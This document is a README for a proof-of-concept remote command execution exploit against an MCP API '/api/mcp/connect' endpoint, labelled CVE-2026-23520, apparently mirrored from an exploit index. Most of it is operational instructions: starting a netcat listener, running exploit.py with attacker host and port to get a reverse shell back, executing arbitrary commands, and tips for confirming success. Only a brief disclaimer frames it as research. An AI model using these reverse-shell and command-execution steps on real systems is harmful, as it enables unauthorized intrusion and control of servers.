Share
## https://sploitus.com/exploit?id=FE59243C-F05E-52AF-BDF1-06E0D3936CE4
# CVE-2026-23520

## MCP API Remote Command Execution (RCE) Proof-of-Concept

---

## ๐Ÿ“Œ Overview

This repository provides a Proof-of-Concept (PoC) exploit for a Remote Command Execution (RCE) vulnerability affecting applications that expose a vulnerable MCP API endpoint (commonly `/api/mcp/connect`).

The issue allows an attacker to supply a crafted JSON payload that results in arbitrary command execution on the target system.

This tool is intended for **authorized security testing and research purposes only**.

---

## โš™๏ธ Capabilities

* Reverse shell execution
* Arbitrary command execution
* Supports HTTP and HTTPS targets
* Accepts IP address, domain, or full URL
* Customizable endpoint path
* Verbose/debug mode for inspection

---

## ๐Ÿš€ Quick Start (Reverse Shell)

Start a listener on your machine:

```bash
nc -lvnp 6666
```

Execute the exploit:

```bash
python3 exploit.py target.com --lhost  --lport 6666
```

If the target is vulnerable, a shell should connect back to your listener.

---

## ๐Ÿ’ป Command Execution Mode

To execute a single command instead of spawning a shell:

```bash
python3 exploit.py target.com --cmd "id"
```

---

## ๐Ÿ“ฅ Usage

```bash
python3 exploit.py  [options]
```

---

## ๐Ÿ”‘ Required Input

| Parameter | Description                    |
| --------- | ------------------------------ |
| target    | Target IP, domain, or full URL |

---

## โš ๏ธ Execution Mode (Choose One)

| Option            | Description               |
| ----------------- | ------------------------- |
| --lhost + --lport | Establish a reverse shell |
| --cmd             | Execute a single command  |

---

## ๐Ÿ”ง Optional Parameters

| Flag           | Description                              |
| -------------- | ---------------------------------------- |
| -p, --port     | Target port (default: 443)               |
| -s, --scheme   | Protocol: http or https (default: https) |
| -e, --endpoint | Vulnerable endpoint path                 |
| -t, --timeout  | Request timeout (seconds)                |
| -v, --verbose  | Enable debug output                      |

---

## ๐Ÿงช Examples

### Reverse Shell

```bash
python3 exploit.py target.com --lhost 10.10.14.15 --lport 6666
```

### HTTP Target

```bash
python3 exploit.py target.com -s http -p 80 --lhost 10.10.14.15 --lport 4444
```

### Custom Endpoint

```bash
python3 exploit.py target.com -e /v1/connect --lhost 10.10.14.15 --lport 9001
```

### Execute Command

```bash
python3 exploit.py target.com --cmd "whoami"
```

---

## ๐Ÿง  Operational Notes

* A lack of HTTP response (timeout) does **not** indicate failure.
  In many cases, successful exploitation may cause the server to stop responding while executing the payload.

* Always monitor your listener or other out-of-band channels.

* The reverse shell payload assumes `/bin/bash` is available on the target system.

---

## โš ๏ธ Disclaimer

This tool is provided for **educational purposes and authorized security assessments only**.

Unauthorized use against systems you do not own or have permission to test is illegal.

---

## ๐Ÿ‘จโ€๐Ÿ’ป Author
Parosh B.